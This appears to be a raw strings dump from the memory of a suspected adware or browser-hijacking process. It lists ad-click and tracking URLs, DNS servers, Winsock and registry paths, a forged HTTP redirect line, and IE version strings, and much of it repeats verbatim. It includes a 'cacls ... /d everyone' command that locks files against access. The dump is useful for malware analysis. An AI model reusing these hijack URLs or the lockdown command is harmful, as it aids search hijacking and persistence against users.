hinthk.dll
zclm8.com
wq581.com
maimeng8.com
5sla.com
wb360.net
renren.com
jj123.com.cn
wb12318.com
iwb110.com
woai310.com
http://123.sogou.com
http://www.sogou.com/sogou
http://www.sogou.com/index
.info
http://baidu.com
{X-X-x-XX-XXXXXX}
www.soso.com
www.google.com
www.hao123.com
www.tao123.com
www.baidu.com
123.sogou.com
www.sogou.com
www.iwb110.com
rpcrt4.dll
kernel32.dll
{xxxx-xx-xx-xx-xxxxxx}
127.0.0.1
208.67.222.222
208.67.220.220
114.114.114.114
114.114.115.115
8.8.8.8
8.8.8.9
8.8.4.4
Shell.Dusn
1.2.3
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
ZwQueryValueKey
ZwOpenKey
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}
xxxxxx
http://www.baidu.com/adrc.php?
http://www.baidu.com/baidu.php?
http://www.baidu.com/s?
http://www.hao123.com/?
http://123.sogou.com/?
http://www.sogou.com/img/fav.ico?
http://pv.sogou.com/pv.gif?
http://pb.sogou.com/pv.gif?
http://pb.sogou.com/cl.gif?
http://www.google.com/aclk?
http://www.sogou.com/bill_
http://www.sogou.com/sogou?
http://test.hermes.sogou.com/sa.gif?
http://www.sogou.com/index.htm
118.145.16.80
%SystemRoot%\System32\mswsock.dll
Tcpip
SupportedNameSpace
%SystemRoot%\System32\winrnr.dll
%SystemRoot%\system32\mswsock.dll
%SystemRoot%\system32\rsvpsp.dll
|%SystemRoot%\system32\rsvpsp.dll
000000000011
000000000010
000000000009
000000000008
000000000007
000000000006
000000000005
000000000004
000000000003
000000000002
000000000001
shdocvw.dll
ieframe.dll
http://www.sogou.com/sogou?query=
sogou-netb-xx-d
%%X
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeaders
\StringFileInfo\xx\%s
user32.dll
6.0.2800.1106
6.00.2600.0000
6.00.2600.0000 (xpclient.010817-1148)
6.00.2737.800
6.00.2800.1106
6.00.2800.1106 (xpsp1.020828-1920)
6.00.2800.1400
6.00.2800.1485
6.00.2800.1496
6.00.2800.1603
6.00.2800.1607
6.00.2800.1611
6.00.2800.1615
6.00.2800.1617
6.00.2800.1623
6.00.2800.1627
6.00.2800.1632
6.00.2800.1644
6.00.2800.1649
6.00.2800.1650
6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
6.00.2900.2518 (xpsp.040919-1030)
6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)
6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)
6.00.2900.2598 (xpsp.041130-1728)
6.00.2900.2627 (xpsp.050309-1719)
6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
6.00.2900.2668 (xpsp.050430-1553)
6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)
6.00.2900.2713 (xpsp.050702-1518)
6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)
6.00.2900.2753 (xpsp.050902-1331)
6.00.2900.2781 (xpsp.051020-1728)
6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)
6.00.2900.2823 (xpsp.060106-1527)
6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)
6.00.2900.2861 (xpsp.060303-1528)
6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)
6.00.2900.2904 (xpsp.060509-0230)
6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)
6.00.2900.2937 (xpsp.060623-0011)
6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)
6.00.2900.2995 (xpsp.060913-0019)
6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)
6.00.2900.3020 (xpsp.061023-0222)
6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)
6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)
6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)
6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)
6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)
6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)
6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)
6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)
6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)
6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)
6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)
6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)
6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)
6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)
6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)
6.00.2900.3300 (xpsp.080125-2028)
6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)
6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)
6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)
6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)
6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)
6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)
6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)
6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)
6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)
6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)
6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)
6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)
6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)
6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)
6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)
6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)
6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)
6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)
6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)
6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)
6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)
6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)
6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)
6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)
6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)
6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)
6.00.2900.5512 (xpsp.080413-2105)
6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)
6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)
6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)
6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)
6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)
6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)
6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)
6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)
6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)
6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)
6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)
6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)
6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)
6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)
6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)
6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)
6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)
6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)
6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)
6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)
6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)
6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)
6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)
6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)
6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)
6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)
6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)
6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)
6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)
6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)
6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)
6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)
6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)
6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)
6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)
6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)
6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)
6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)
6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)
6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)
6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)
6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)
6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)
6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)
6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)
6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)
6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)
6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)
6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)
6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)
6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)
6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)
6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)
6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)
6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)
6.00.3790.0 (srv03_rtm.030324-2048)
6.00.3790.118 (srv03_gdr.031205-1652)
6.00.3790.118 (srv03_qfe.031205-1652)
6.00.3790.1830 (srv03_sp1_rtm.050324-1447)
6.00.3790.186 (srv03_gdr.040410-1234)
6.00.3790.186 (srv03_qfe.040410-1236)
6.00.3790.2509 (srv03_sp1_gdr.050815-1517)
6.00.3790.2653 (srv03_sp1_gdr.060303-1536)
6.00.3790.2653 (srv03_sp1_qfe.060303-1552)
6.00.3790.2732 (srv03_sp1_gdr.060623-0310)
6.00.3790.2732 (srv03_sp1_qfe.060623-0318)
6.00.3790.2817 (srv03_sp1_gdr.061023-0100)
6.00.3790.2993 (srv03_sp1_gdr.070817-1316)
6.00.3790.2993 (srv03_sp1_qfe.070817-1316)
6.00.3790.3041 (srv03_sp1_gdr.071107-1901)
6.00.3790.3041 (srv03_sp1_qfe.071107-1901)
6.00.3790.3091 (srv03_sp1_gdr.080215-1206)
6.00.3790.3091 (srv03_sp1_qfe.080215-1206)
6.00.3790.3194 (srv03_sp1_gdr.080819-1207)
6.00.3790.3194 (srv03_sp1_qfe.080819-1207)
6.00.3790.3229 (srv03_sp1_gdr.081016-1620)
6.00.3790.3229 (srv03_sp1_qfe.081016-1620)
6.00.3790.3304 (srv03_sp1_gdr.090303-1204)
6.00.3790.3304 (srv03_sp1_qfe.090303-1204)
6.00.3790.3959 (srv03_sp2_rtm.070216-1710)
6.00.3790.4186 (srv03_sp2_gdr.071108-1306)
6.00.3790.4186 (srv03_sp2_qfe.071108-1306)
6.00.3790.4210 (srv03_sp2_qfe.071221-1418)
6.00.3790.4237 (srv03_sp2_gdr.080215-1206)
6.00.3790.4237 (srv03_sp2_qfe.080215-1206)
6.00.3790.4275 (srv03_sp2_gdr.080417-1307)
6.00.3790.4275 (srv03_sp2_qfe.080417-1307)
6.00.3790.4324 (srv03_sp2_qfe.080630-1205)
6.00.3790.4357 (srv03_sp2_gdr.080819-1207)
6.00.3790.4357 (srv03_sp2_qfe.080819-1207)
6.00.3790.4392 (srv03_sp2_gdr.081016-1620)
6.00.3790.4392 (srv03_sp2_qfe.081016-1620)
6.00.3790.4470 (srv03_sp2_gdr.090303-1204)
6.00.3790.4470 (srv03_sp2_qfe.090303-1204)
6.00.3790.4504 (srv03_sp2_gdr.090428-1405)
6.00.3790.4504 (srv03_sp2_qfe.090428-1405)
6.00.3790.4539 (srv03_sp2_gdr.090626-1428)
6.00.3790.4539 (srv03_sp2_qfe.090626-1428)
6.00.3790.4589 (srv03_sp2_gdr.090914-1233)
6.00.3790.4589 (srv03_sp2_qfe.090914-1233)
6.00.3790.4672 (srv03_sp2_gdr.100225-1230)
6.00.3790.4672 (srv03_sp2_qfe.100225-1230)
6.00.3790.4696 (srv03_sp2_gdr.100419-1942)
6.00.3790.4732 (srv03_sp2_gdr.100623-0356)
6.00.3790.4732 (srv03_sp2_qfe.100623-0356)
6.00.3790.4772 (srv03_sp2_gdr.100908-1010)
6.00.3790.4772 (srv03_sp2_qfe.100908-1010)
6.00.3790.4795 (srv03_sp2_qfe.101103-0357)
6.00.3790.4807 (srv03_sp2_gdr.101220-0307)
6.00.3790.4807 (srv03_sp2_qfe.101220-0307)
6.00.3790.4835 (srv03_sp2_gdr.110222-0239)
6.00.3790.4835 (srv03_sp2_qfe.110222-0239)
6.00.3790.4857 (srv03_sp2_gdr.110425-0335)
6.00.3790.4857 (srv03_sp2_qfe.110425-0335)
6.00.3790.4879 (srv03_sp2_gdr.110621-0342)
6.00.3790.4879 (srv03_sp2_qfe.110621-0342)
6.00.3790.4904 (srv03_sp2_gdr.110905-0334)
6.00.3790.4904 (srv03_sp2_qfe.110905-0334)
6.00.3790.4929 (srv03_sp2_gdr.111104-0342)
6.00.3790.4929 (srv03_sp2_qfe.111104-0342)
6.00.3790.4944 (srv03_sp2_gdr.111216-0308)
6.00.3790.4944 (srv03_sp2_qfe.111216-0308)
6.00.3790.4969 (srv03_sp2_gdr.120228-0234)
6.00.3790.4969 (srv03_sp2_qfe.120228-0234)
6.00.3790.5004 (srv03_sp2_gdr.120515-0336)
6.00.3790.5004 (srv03_sp2_qfe.120515-0336)
6.00.3790.5029 (srv03_sp2_gdr.120628-0335)
6.00.3790.5029 (srv03_sp2_qfe.120628-0335)
6.00.3790.5060 (srv03_sp2_gdr.120824-0334)
6.00.3790.5060 (srv03_sp2_qfe.120824-0334)
6.00.3790.5080 (srv03_sp2_gdr.121026-1534)
6.00.3790.5080 (srv03_sp2_qfe.121026-1534)
HTTP/1.
HTTP/1.1 302 Moved Temporarily
http://www.baidu.com/s? tn=
http://www.baidu.com/
http://www.sogou.com/sogou? pid=
http://www.sogou.com/index. pid=
http://rlt.inte.sogou.com/
MSAFD Tcpip [TCP/IP]
MSAFD Tcpip [UDP/IP]
MSAFD Tcpip [RAW/IP]
RSVP UDP Service Provider
\Device\NetBT_Tcpip
RSVP TCP Service Provider
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] SEQPACKET 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{01593444-4DB3-4CEB-A054-D07FB68368D6}] DATAGRAM 0
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] SEQPACKET 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{4CBD1967-6C39-4808-987E-2ACE8650DA25}] DATAGRAM 1
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] SEQPACKET 2
MSAFD NetBIOS [\Device\NetBT_Tcpip_{152A0A5A-25FD-438F-BF04-B180CF0B9BAD}] DATAGRAM 2
tv_w32.dll
indicdll.dll
mshtml.dll
shell32.dll
msctfime.ime
msctf.dll
uxtheme.dll
Microsoft(R) Windows(R) Operating System
6, 0, 2900, 5512
6.00.2900.5512

dsau.exe_3672_rwx_00960000_00009000:




.text
`.bss
.rdata
@.data
.reloc
KERNEL32.dll
.rsrc
.data
kernel32.dll
PEPack.dll
%s : X
12222221
More information: http://www.ibsensoftware.com/
3<3q3

dsau.exe_3672_rwx_00CA0000_00053000:




__MSVCRT_HEAP_SELECT
inflate 1.2.3 Copyright 1995-2005 Mark Adler
iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
explorer.exe
igfxsrvc.exe
{5D562E5F-741F-4b50-AB7B-7A997CEB9557}
{XXXX-XX-XX-XX-XXXXXX}
cacls.exe "%s" /e /d everyone
%Program Files%\E-yoo\EyooSechelper2.dll
http://
XXXXXXXXXXXXXXXX
Software\Microsoft\Windows\ShellNoRoam\TempCache
Software\Microsoft\Windows\ShellNoRoam\ShellCache
herollq.exe
WebPlayer2010.exe
VODPlayer.exe
JSKPBrowser.exe
ValeBrowser.exe
wmconfig.exe
NewBho.DLL
\ext\settings\{11f09afe-75ad-4e52-ab43-e09e9351ce17}
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\WCom Object
software\policies\microsoft\windows nt\dnsclient
ws2_32.dll
ole32.dll
ieui.dll
mshtml.dll
IEFrame.dll
iertutil.dll
User32.dll
SHLWAPI.dll
wininet.dll
urlmon.dll
mswsock.dll
ws2help.dll
RegOpenKeyExA
RegOpenKeyExW
NtQueryValueKey
NtOpenKey
ADVAPI32.dll
ntdll.dll
Kernel32.dll
dnsapi.dll
msvcrt
PubwinClient.exe
RunMe.exe
{11F09AFE-75AD-4E52-AB43-E09E9351CE17}
Shell.User\Group
oleaut32.dll
browseti.dll
hinthk.dll
zclm8.com
wq581.com
maimeng8.com
5sla.com
wb360.net
renren.com
jj123.com.cn
wb12318.com
iwb110.com
woai310.com
http://123.sogou.com
http://www.sogou.com/sogou
http://www.sogou.com/index
.info
http://baidu.com
{X-X-x-XX-XXXXXX}
www.soso.com
www.google.com
www.hao123.com
www.tao123.com
www.baidu.com
123.sogou.com
www.sogou.com
www.iwb110.com
rpcrt4.dll
kernel32.dll
{xxxx-xx-xx-xx-xxxxxx}
127.0.0.1
208.67.222.222
208.67.220.220
114.114.114.114
114.114.115.115
8.8.8.8
8.8.8.9
8.8.4.4
Shell.Dusn
1.2.3
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
ZwQueryValueKey
ZwOpenKey
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}
xxxxxx
http://www.baidu.com/adrc.php?
http://www.baidu.com/baidu.php?
http://www.baidu.com/s?
http://www.hao123.com/?
http://123.sogou.com/?
http://www.sogou.com/img/fav.ico?
http://pv.sogou.com/pv.gif?
http://pb.sogou.com/pv.gif?
http://pb.sogou.com/cl.gif?
http://www.google.com/aclk?
http://www.sogou.com/bill_
http://www.sogou.com/sogou?
http://test.hermes.sogou.com/sa.gif?
http://www.sogou.com/index.htm
118.145.16.80
%SystemRoot%\System32\mswsock.dll
Tcpip
SupportedNameSpace
%SystemRoot%\System32\winrnr.dll
%SystemRoot%\system32\mswsock.dll
%SystemRoot%\system32\rsvpsp.dll
|%SystemRoot%\system32\rsvpsp.dll
000000000011
000000000010
000000000009
000000000008
000000000007
000000000006
000000000005
000000000004
000000000003
000000000002
000000000001
shdocvw.dll
ieframe.dll
http://www.sogou.com/sogou?query=
sogou-netb-xx-d
%%X
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeaders
\StringFileInfo\xx\%s
user32.dll
6.0.2800.1106
6.00.2600.0000
6.00.2600.0000 (xpclient.010817-1148)
6.00.2737.800
6.00.2800.1106
6.00.2800.1106 (xpsp1.020828-1920)
6.00.2800.1400
6.00.2800.1485
6.00.2800.1496
6.00.2800.1603
6.00.2800.1607
6.00.2800.1611
6.00.2800.1615
6.00.2800.1617
6.00.2800.1623
6.00.2800.1627
6.00.2800.1632
6.00.2800.1644
6.00.2800.1649
6.00.2800.1650
6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
6.00.2900.2518 (xpsp.040919-1030)
6.00.2900.2518 (xpsp_sp2_gdr.040919-1056)
6.00.2900.2577 (xpsp_sp2_gdr.041130-1729)
6.00.2900.2598 (xpsp.041130-1728)
6.00.2900.2627 (xpsp.050309-1719)
6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
6.00.2900.2668 (xpsp.050430-1553)
6.00.2900.2668 (xpsp_sp2_gdr.050430-1553)
6.00.2900.2713 (xpsp.050702-1518)
6.00.2900.2713 (xpsp_sp2_gdr.050702-1513)
6.00.2900.2753 (xpsp.050902-1331)
6.00.2900.2781 (xpsp.051020-1728)
6.00.2900.2781 (xpsp_sp2_gdr.051020-1730)
6.00.2900.2823 (xpsp.060106-1527)
6.00.2900.2823 (xpsp_sp2_gdr.060106-1520)
6.00.2900.2861 (xpsp.060303-1528)
6.00.2900.2861 (xpsp_sp2_gdr.060303-1517)
6.00.2900.2904 (xpsp.060509-0230)
6.00.2900.2904 (xpsp_sp2_gdr.060509-0218)
6.00.2900.2937 (xpsp.060623-0011)
6.00.2900.2937 (xpsp_sp2_gdr.060623-0002)
6.00.2900.2995 (xpsp.060913-0019)
6.00.2900.2995 (xpsp_sp2_gdr.060913-0010)
6.00.2900.3020 (xpsp.061023-0222)
6.00.2900.3020 (xpsp_sp2_gdr.061023-0214)
6.00.2900.3059 (xpsp_sp2_gdr.070104-0050)
6.00.2900.3059 (xpsp_sp2_qfe.070104-0040)
6.00.2900.3086 (xpsp_sp2_gdr.070218-2314)
6.00.2900.3086 (xpsp_sp2_qfe.070218-2342)
6.00.2900.3121 (xpsp_sp2_gdr.070418-1302)
6.00.2900.3121 (xpsp_sp2_qfe.070418-1302)
6.00.2900.3164 (xpsp_sp2_gdr.070626-1259)
6.00.2900.3164 (xpsp_sp2_qfe.070626-1258)
6.00.2900.3199 (xpsp_sp2_gdr.070821-1257)
6.00.2900.3199 (xpsp_sp2_qfe.070821-1250)
6.00.2900.3231 (xpsp_sp2_gdr.071010-1320)
6.00.2900.3231 (xpsp_sp2_qfe.071010-1316)
6.00.2900.3268 (xpsp_sp2_gdr.071206-1518)
6.00.2900.3268 (xpsp_sp2_qfe.071206-1251)
6.00.2900.3300 (xpsp.080125-2028)
6.00.2900.3314 (xpsp_sp2_gdr.080215-1241)
6.00.2900.3314 (xpsp_sp2_qfe.080215-1242)
6.00.2900.3354 (xpsp_sp2_gdr.080417-1412)
6.00.2900.3354 (xpsp_sp2_qfe.080417-1416)
6.00.2900.3395 (xpsp_sp2_gdr.080623-1307)
6.00.2900.3395 (xpsp_sp2_qfe.080623-1318)
6.00.2900.3429 (xpsp_sp2_gdr.080819-1231)
6.00.2900.3429 (xpsp_sp2_qfe.080819-1244)
6.00.2900.3462 (xpsp_sp2_gdr.081015-1244)
6.00.2900.3462 (xpsp_sp2_qfe.081015-1657)
6.00.2900.3527 (xpsp_sp2_gdr.090219-1253)
6.00.2900.3527 (xpsp_sp2_qfe.090219-1311)
6.00.2900.3562 (xpsp_sp2_gdr.090427-1232)
6.00.2900.3562 (xpsp_sp2_qfe.090427-1240)
6.00.2900.3592 (xpsp_sp2_gdr.090622-1453)
6.00.2900.3592 (xpsp_sp2_qfe.090622-1503)
6.00.2900.3627 (xpsp_sp2_gdr.090918-1238)
6.00.2900.3627 (xpsp_sp2_qfe.090918-1245)
6.00.2900.3640 (xpsp_sp2_gdr.091027-1355)
6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)
6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)
6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)
6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)
6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)
6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)
6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)
6.00.2900.5512 (xpsp.080413-2105)
6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)
6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)
6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)
6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)
6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)
6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)
6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)
6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)
6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)
6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)
6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)
6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)
6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)
6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)
6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)
6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)
6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)
6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)
6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)
6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)
6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)
6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)
6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)
6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)
6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)
6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)
6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)
6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)
6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)
6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)
6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)
6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)
6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)
6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)
6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)
6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)
6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)
6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)
6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)
6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)
6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)
6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)
6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)
6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)
6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)
6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)
6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)
6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)
6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)
6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)
6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)
6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)
6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)
6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)
6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)
6.00.3790.0 (srv03_rtm.030324-2048)
6.00.3790.118 (srv03_gdr.031205-1652)
6.00.3790.118 (srv03_qfe.031205-1652)
6.00.3790.1830 (srv03_sp1_rtm.050324-1447)
6.00.3790.186 (srv03_gdr.040410-1234)
6.00.3790.186 (srv03_qfe.040410-1236)
6.00.3790.2509 (srv03_sp1_gdr.050815-1517)
6.00.3790.2653 (srv03_sp1_gdr.060303-1536)
6.00.3790.2653 (srv03_sp1_qfe.060303-1552)
6.00.3790.2732 (srv03_sp1_gdr.060623-0310)
6.00.3790.2732 (srv03_sp1_qfe.060623-0318)
6.00.3790.2817 (srv03_sp1_gdr.061023-0100)
6.00.3790.2993 (srv03_sp1_gdr.070817-1316)
6.00.3790.2993 (srv03_sp1_qfe.070817-1316)
6.00.3790.3041 (srv03_sp1_gdr.071107-1901)
6.00.3790.3041 (srv03_sp1_qfe.071107-1901)
6.00.3790.3091 (srv03_sp1_gdr.080215-1206)
6.00.3790.3091 (srv03_sp1_qfe.080215-1206)
6.00.3790.3194 (srv03_sp1_gdr.080819-1207)
6.00.3790.3194 (srv03_sp1_qfe.080819-1207)
6.00.3790.3229 (srv03_sp1_gdr.081016-1620)
6.00.3790.3229 (srv03_sp1_qfe.081016-1620)
6.00.3790.3304 (srv03_sp1_gdr.090303-1204)
6.00.3790.3304 (srv03_sp1_qfe.090303-1204)
6.00.3790.3959 (srv03_sp2_rtm.070216-1710)
6.00.3790.4186 (srv03_sp2_gdr.071108-1306)
6.00.3790.4186 (srv03_sp2_qfe.071108-1306)
6.00.3790.4210 (srv03_sp2_qfe.071221-1418)
6.00.3790.4237 (srv03_sp2_gdr.080215-1206)
6.00.3790.4237 (srv03_sp2_qfe.080215-1206)
6.00.3790.4275 (srv03_sp2_gdr.080417-1307)
6.00.3790.4275 (srv03_sp2_qfe.080417-1307)
6.00.3790.4324 (srv03_sp2_qfe.080630-1205)
6.00.3790.4357 (srv03_sp2_gdr.080819-1207)
6.00.3790.4357 (srv03_sp2_qfe.080819-1207)
6.00.3790.4392 (srv03_sp2_gdr.081016-1620)
6.00.3790.4392 (srv03_sp2_qfe.081016-1620)
6.00.3790.4470 (srv03_sp2_gdr.090303-1204)
6.00.3790.4470 (srv03_sp2_qfe.090303-1204)
6.00.3790.4504 (srv03_sp2_gdr.090428-1405)
6.00.3790.4504 (srv03_sp2_qfe.090428-1405)
6.00.3790.4539 (srv03_sp2_gdr.090626-1428)
6.00.3790.4539 (srv03_sp2_qfe.090626-1428)
